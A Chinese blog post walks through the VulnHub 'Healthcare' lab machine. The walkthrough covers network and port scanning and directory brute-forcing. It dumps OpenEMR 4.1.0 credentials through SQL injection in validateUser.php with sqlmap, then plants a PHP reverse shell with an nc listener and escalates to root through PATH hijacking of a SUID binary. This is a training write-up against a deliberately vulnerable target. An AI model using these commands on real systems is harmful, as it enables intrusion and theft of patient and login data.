vulnhub之Healthcare的实践

admin 2022年12月26日13:15:57评论20 views字数 1244阅读4分8秒阅读模式

今天实践的是vulnhub的Healthcare镜像,

下载地址,https://download.vulnhub.com/healthcare/Healthcare.ova,

用workstation导入,做地址扫描,sudo netdiscover -r 192.168.58.0/24,

169就是靶机,

vulnhub之Healthcare的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.169,

vulnhub之Healthcare的实践

做目录暴破,gobuster dir -u http://192.168.58.169 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt,

vulnhub之Healthcare的实践

浏览器访问http://192.168.58.169/openemr,

vulnhub之Healthcare的实践

搜索OpenEMR v4.1.0的相关漏洞和利用方法,以下url存在sql注入漏洞,

http://x.x.x.x/openemr/interface/login/validateUser.php?u=,

vulnhub之Healthcare的实践

做数据库暴破,sqlmap -u http://192.168.58.169/openemr/interface/login/validateUser.php?u= --dbs --batch,

vulnhub之Healthcare的实践

做数据表项暴破,sqlmap -u http://192.168.58.169/openemr/interface/login/validateUser.php?u= -D openemr -T users --dump --batch,

vulnhub之Healthcare的实践

获取到两组用户名密码,admin/ackbar,medical/medical,

用admin/ackbar登录进http://192.168.58.169/openemr,

找到一处可以放web shell的页面,

vulnhub之Healthcare的实践

直接用kali攻击机上的web shell脚本,

cat /usr/share/webshells/php/php-reverse-shell.php,

贴上去修改内容并保存,

vulnhub之Healthcare的实践

kali攻击机上开个反弹shell监听,nc -lvp 4444,

重新访问web shell页面,反弹shell就过来了,不是root,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/bash")',

切到medical账户,还不是root,

vulnhub之Healthcare的实践

查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,

vulnhub之Healthcare的实践

发现/usr/bin/healthcheck

查看程序内容,strings /usr/bin/healthcheck,

vulnhub之Healthcare的实践

制作假的fdisk程序,

cd /tmp,echo "/bin/bash" > fdisk,chmod 777 fdisk,

export PATH=/tmp:$PATH,执行/usr/bin/healthcheck,

获取到root的shell,

vulnhub之Healthcare的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Healthcare的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月26日13:15:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Healthcare的实践http://cn-sec.com/archives/1481882.html

发表评论

匿名网友 填写信息